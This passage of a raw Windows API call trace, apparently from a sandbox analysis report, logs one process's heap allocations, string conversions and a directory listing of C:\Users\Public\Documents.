lpUsedDefaultChar=0x0) returned 9 [0268.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e54858 [0268.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0268.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Public\\Documents", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0268.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1a) returned 0x2e54238 [0268.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Public\\Documents", cchWideChar=26, lpMultiByteStr=0x2e54238, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\Public\\Documents", lpUsedDefaultChar=0x0) returned 26 [0268.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0268.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0268.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0268.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x34) returned 0x2e77588 [0268.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0268.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0268.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0268.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0268.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0268.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0268.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0268.720] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e54440, cbMultiByte=26, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 26 [0268.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x34) returned 0x2e77788 [0268.720] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e54440, cbMultiByte=26, lpWideCharStr=0x2e77788, cchWideChar=26 | out: lpWideCharStr="C:\\Users\\Public\\Documents") returned 26 [0268.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0268.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0268.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0268.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0268.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0268.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0268.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0268.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0268.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0268.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0268.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0268.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0268.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0268.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0268.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0268.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0268.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0268.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0268.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0268.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0268.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0268.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0268.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0268.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0268.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0268.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0268.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0268.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0268.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0268.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0268.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0268.721] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0268.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0268.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0268.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0268.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0268.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0268.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0268.721] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\" (normalized: "c:\\users\\public\\documents")) returned 0x11 [0268.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0268.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0268.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0268.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0268.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0268.722] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0268.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0268.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0268.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0268.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0268.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0268.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0268.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0268.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0268.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0268.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0268.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0268.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0268.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0268.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0268.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0268.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17) returned 0x2e69a88 [0268.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x2e69a88, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", lpUsedDefaultChar=0x0) returned 23 [0268.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0268.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0268.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0268.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x59) returned 0x2e558d8 [0268.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51640 [0268.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0268.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0268.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x2e54e78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*.*", lpUsedDefaultChar=0x0) returned 4 [0268.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0268.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0268.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0268.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0268.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0268.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0268.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0268.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0268.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0268.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0268.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0268.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0268.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0268.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0268.724] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0268.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0268.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0268.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0268.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0268.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0268.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0268.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0268.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0268.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0268.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0268.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0268.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0268.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0268.724] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0268.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0268.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0268.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0268.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0268.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0268.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0268.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0268.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0268.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0268.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0268.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0268.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0268.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0268.725] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*.*", lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName=".", cAlternateFileName="")) returned 0xa875d0 [0268.728] FindNextFileW (in: hFindFile=0xa875d0, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName="..", cAlternateFileName="")) returned 1 [0268.728] FindNextFileW (in: hFindFile=0xa875d0, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0268.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0268.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0268.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0268.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0268.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0268.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0268.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0268.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0268.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0268.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0268.728] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0268.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0268.728] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0268.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0268.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0268.728] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0268.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0268.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0268.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0268.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0268.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0268.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0268.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0268.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0268.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0268.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0268.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0268.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0268.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0268.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0268.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0268.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0268.729] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0268.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0268.729] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0268.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0268.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0268.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0268.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0268.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0268.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0268.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0268.729] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0268.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0268.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0268.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0268.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0268.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0268.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0268.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0268.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0268.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0268.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0268.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0268.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0268.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0268.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0268.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0268.730] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0268.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0268.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: 